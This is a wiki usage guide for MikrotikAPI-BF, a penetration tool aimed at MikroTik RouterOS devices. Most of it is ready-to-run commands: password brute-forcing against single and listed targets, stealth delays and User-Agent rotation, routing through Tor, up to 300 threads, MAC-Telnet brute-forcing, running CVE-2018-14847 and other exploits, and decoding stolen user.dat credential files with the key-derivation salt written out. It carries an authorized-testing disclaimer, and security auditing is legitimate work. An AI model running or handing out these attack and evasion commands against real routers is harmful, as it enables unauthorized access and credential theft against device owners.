Complete Usage Guide - mrhenrike/MikrotikAPI-BF GitHub Wiki

Complete Usage Guide — MikrotikAPI-BF v3.10.0

For authorized security testing only. All examples require explicit written permission from the target system's owner.

Quick Start

git clone https://github.com/mrhenrike/MikrotikAPI-BF.git
cd MikrotikAPI-BF
pip install -r requirements.txt
python mikrotikapi-bf.py --help

1. Basic Brute-Force

Single target, single user, password list

python mikrotikapi-bf.py -t 192.168.1.1 -U admin -d wordlists/passwords.lst

Username list + password list

python mikrotikapi-bf.py -t 192.168.1.1 -u users.lst -p passwords.lst

Combo file (user:pass format)

python mikrotikapi-bf.py -t 192.168.1.1 -d combos.lst

Custom API port

python mikrotikapi-bf.py -t 192.168.1.1 --api-port 1337 -d passwords.lst

Test single credential

python mikrotikapi-bf.py -t 192.168.1.1 -U admin -P mypassword

2. Multi-Target Scanning (v3.5.0+)

From targets.txt (one IP per line, # for comments):

# targets.txt
192.168.1.1
192.168.1.254
10.0.0.1

python mikrotikapi-bf.py -T targets.txt -d passwords.lst -U admin
python mikrotikapi-bf.py --target-list targets.txt -d combos.lst --threads 5

3. Post-Login Service Validation

# Validate FTP, SSH, Telnet after successful login
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --validate ftp,ssh,telnet

# Custom ports
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --validate ftp=2121,ssh=2222

# All services with verbose output
python mikrotikapi-bf.py -t 192.168.1.1 -U admin -P pass \
  --validate ftp,ssh,telnet --verbose

4. CVE / Vulnerability Scanning

# Scan applicable CVEs for the detected RouterOS version
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve -U admin -P pass

# Scan ALL CVEs (regardless of version match)
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves -U admin -P pass

# Export CVE results to JSON
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves \
  -U admin -P pass --export json --export-dir ./results

5. MAC-Server / Layer-2 Discovery (v3.3.0+)

Requires being on the same Layer-2 segment (VLAN/switch).

# Discover all Mikrotik devices on the local L2 segment
python mikrotikapi-bf.py --mac-discover

# Discover + brute-force credentials via MAC-Telnet
python mikrotikapi-bf.py --mac-discover --mac-brute -d passwords.lst

# Run CVE-2018-14847 against all discovered devices
python mikrotikapi-bf.py --mac-scan-cve

# Specify local IP for MNDP broadcast
python mikrotikapi-bf.py --mac-discover --mac-iface-ip 192.168.1.50

6. Offline Credential Decoders (v3.5.0+)

Based on research by Kirils Solovjovs (0ki/mikrotik-tools).

Decode user.dat (obtained via CVE-2018-14847)

# Basic decode
python mikrotikapi-bf.py --decode-userdat user.dat

# With index file for better accuracy
python mikrotikapi-bf.py --decode-userdat user.dat --decode-useridx user.idx

# Password algorithm (for reference):
# key = MD5(username + "283i4jfkai3389")  # 16 bytes
# plaintext = XOR(encrypted_password, key * 16)

Decode .backup file

python mikrotikapi-bf.py --decode-backup router.backup
# Extracts all .dat/.idx files and auto-decodes user credentials

Analyze NPK package (CVE-2019-3977)

python mikrotikapi-bf.py --analyze-npk routeros-7.20.7-x86_64.npk
# Lists parts, checks digest, detects install scripts

List supout.rif sections

python mikrotikapi-bf.py --decode-supout supout.rif

7. Device Fingerprinting

python mikrotikapi-bf.py -t 192.168.1.1 -U admin -P pass --fingerprint

8. Stealth Mode

# Fibonacci delays, randomized User-Agents
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --stealth

# Custom delay between attempts
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst -s 10

9. Threading

# Default: 2 threads; max 15
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --threads 8

10. Session Resume

# Start with session
python mikrotikapi-bf.py -t 192.168.1.1 -d big_list.lst

# Resume if interrupted (uses saved checkpoint)
python mikrotikapi-bf.py -t 192.168.1.1 -d big_list.lst --resume

# List saved sessions
python mikrotikapi-bf.py --list-sessions

# Force new session (ignore existing)
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --force

11. Export Results

# Export to JSON
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --export json

# Export to all formats (JSON, CSV, XML, TXT)
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --export-all

# Custom export directory
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst \
  --export-all --export-dir ./pentest-report

12. Proxy / SOCKS5

# Route through Tor
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --proxy socks5://127.0.0.1:9050

13. SSL / API-SSL

# Use encrypted API-SSL (port 8729)
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --ssl --api-port 8729

14. Interactive REPL

python mikrotikapi-bf.py --interactive

# Inside REPL:
# mikrotik-bf> scan 192.168.1.0/24      # Discover Mikrotik devices
# mikrotik-bf> scan -r 10.0.0.1 10.0.0.254
# mikrotik-bf> fingerprint 192.168.1.1
# mikrotik-bf> attack 192.168.1.1
# mikrotik-bf> attack 192.168.1.1 -w wordlists/combos.lst
# mikrotik-bf> exploits 192.168.1.1     # Show applicable CVEs
# mikrotik-bf> results                   # Show found credentials
# mikrotik-bf> export json               # Export results
# mikrotik-bf> stealth on
# mikrotik-bf> exit

15. Full Pentest Workflow Example

# 1. Discover + fingerprint
python mikrotikapi-bf.py -t 192.168.1.1 --fingerprint

# 2. Run CVE scan (unauthenticated)
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve

# 3. Brute-force with stealth
python mikrotikapi-bf.py -t 192.168.1.1 \
  -u users.lst -d passwords.lst \
  --stealth --threads 3 --progress

# 4. Full authenticated scan after creds found
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves \
  -U admin -P "C0C0D3GR120" \
  --validate ftp,ssh,telnet \
  --export-all --export-dir ./report/

# 5. MAC-Server attack (if on same L2)
python mikrotikapi-bf.py --mac-discover --mac-brute -d combos.lst

# 6. Decode extracted credentials
python mikrotikapi-bf.py --decode-userdat /tmp/user.dat --decode-useridx /tmp/user.idx

16. Programmatic API (Python)

from xpl.exploits import EXPLOIT_REGISTRY
from modules.decoder import UserDatDecoder

# Run a specific CVE check
e = EXPLOIT_REGISTRY["CVE-2018-14847"]("192.168.1.1", timeout=10)
result = e.check()
print(result)

# Decode user.dat
users = UserDatDecoder.from_files("user.dat", "user.idx")
UserDatDecoder.print_table(users)

# Run all EDB exploits
target = "192.168.1.1"
for eid in [k for k in EXPLOIT_REGISTRY if k.startswith("EDB-")]:
    r = EXPLOIT_REGISTRY[eid](target, timeout=5).check()
    print(f"[{eid}] {'VULN' if r['vulnerable'] else 'SAFE'}: {r.get('evidence','')[:80]}")

17. Environment Variables

export MIKROTIK_TARGET=192.168.1.1
export MIKROTIK_USER=admin
export MIKROTIK_PASS=password
export SHODAN_KEY=your_shodan_key
export NVD_KEY=your_nvd_key

All CLI Flags Reference

Flag Short Description Default Since
--target -t Target IP/hostname v1.0
--target-list -T File with targets (one per line) v3.5.0
--user -U Single username admin v1.0
--passw -P Single password v1.0
--userlist -u Username wordlist file v1.0
--passlist -p Password wordlist file v1.0
--dictionary -d Combo file (user:pass) v1.0
--seconds -s Delay between attempts (s) 5 v1.0
--threads Thread count (max 15, 300 w/ --high-threads) 2 v2.0
--high-threads Allow up to 300 threads false v3.6.0
--delay-mode Delay profile: high/balanced/stealth/custom balanced v3.6.0
--api-port RouterOS API port 8728 v1.0
--rest-port RouterOS REST port 8729 v3.5.0
--http-port HTTP port 80 v3.5.0
--ssl Use HTTPS for REST false v3.5.0
--ssl-port HTTPS port 443 v3.5.0
--validate Post-login validation services v2.1
--verbose -v Show failed attempts false v1.0
--verbose-all -vv Full debug false v2.0
--progress Progress bar + ETA false v2.1
--stealth Stealth delays + UA rotation false v2.1
--fingerprint Advanced device fingerprinting false v2.1
--exploit Run CVE scanner after BF false v3.5.0
--scan-cve Standalone CVE scan false v3.5.0
--all-cves Show all CVEs (ignore version) false v3.5.0
--run-exploit Run specific exploit by CVE/EDB ID v3.10.0
--audit 8-phase automated security audit false v3.10.0
--proxy Proxy URL (socks5://...) v3.5.4
--interactive Start interactive REPL false v3.5.0
--max-retries Connection retry count 1 v3.5.0
--export Export formats (json,csv,xml,txt,sarif) v2.1
--export-all Export to all formats false v2.1
--export-dir Output directory results v2.1
--audit-report Generate PDF audit report false v2.1
--resume Resume from previous session false v2.1
--force Force new session false v2.1
--list-sessions List saved sessions v2.1
--mac-discover MNDP broadcast discovery false v3.3.0
--mac-brute Brute via MAC-Telnet false v3.3.0
--mac-scan-cve CVE-2018-14847-MAC scan false v3.3.0
--mac-iface-ip Local IP for MNDP broadcast 0.0.0.0 v3.3.0
--decode-userdat Decode user.dat offline v3.5.0
--decode-useridx user.idx companion v3.5.0
--decode-backup Decode .backup archive v3.5.0
--analyze-npk Analyze NPK package v3.5.0
--decode-supout List supout.rif sections v3.5.0
--install-nse Install NSE scripts to Nmap v3.6.0

18. NSE Auto-Install

\ash mikrotikapi-install-nse mikrotikapi-bf --install-nse NMAP_SCRIPTS_DIR=/custom/path mikrotikapi-install-nse \

19. High-Thread Mode (up to 300)

\ash python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --threads 100 --high-threads python mikrotikapi-bf.py -T targets.lst -d combos.lst --threads 300 --high-threads \

20. Delay Profiles (v3.6.0+)

\ash python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --delay-mode high # 0s python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --delay-mode balanced # 0.25s python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --delay-mode stealth # 1.0s python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --delay-mode custom -s 0.5 \

21. Run Specific Exploit (v3.10.0+)

\ash python mikrotikapi-bf.py -t 192.168.1.1 --run-exploit CVE-2018-14847 python mikrotikapi-bf.py -t 192.168.1.1 --run-exploit CVE-2023-30799 -U admin -P pass \

22. 8-Phase Security Audit (v3.10.0+)

\ash python mikrotikapi-bf.py -t 192.168.1.1 --audit -U admin -P pass --export sarif python mikrotikapi-bf.py -t 192.168.1.1 --audit -U admin -P pass --export-all
Phases: system enumeration, service mapping, credential audit, injection testing, Winbox probing, SNMP analysis, debug endpoint discovery, firewall audit.

Interactive REPL Commands (v3.10.0+)

\ash python mikrotikapi-bf.py --interactive

mikrotik-bf> run CVE-2018-14847 192.168.1.1 # Run exploit

mikrotik-bf> audit 192.168.1.1 # Run full audit

mikrotik-bf> scan 192.168.1.0/24 # Discover

mikrotik-bf> exploits 192.168.1.1 # List CVEs

\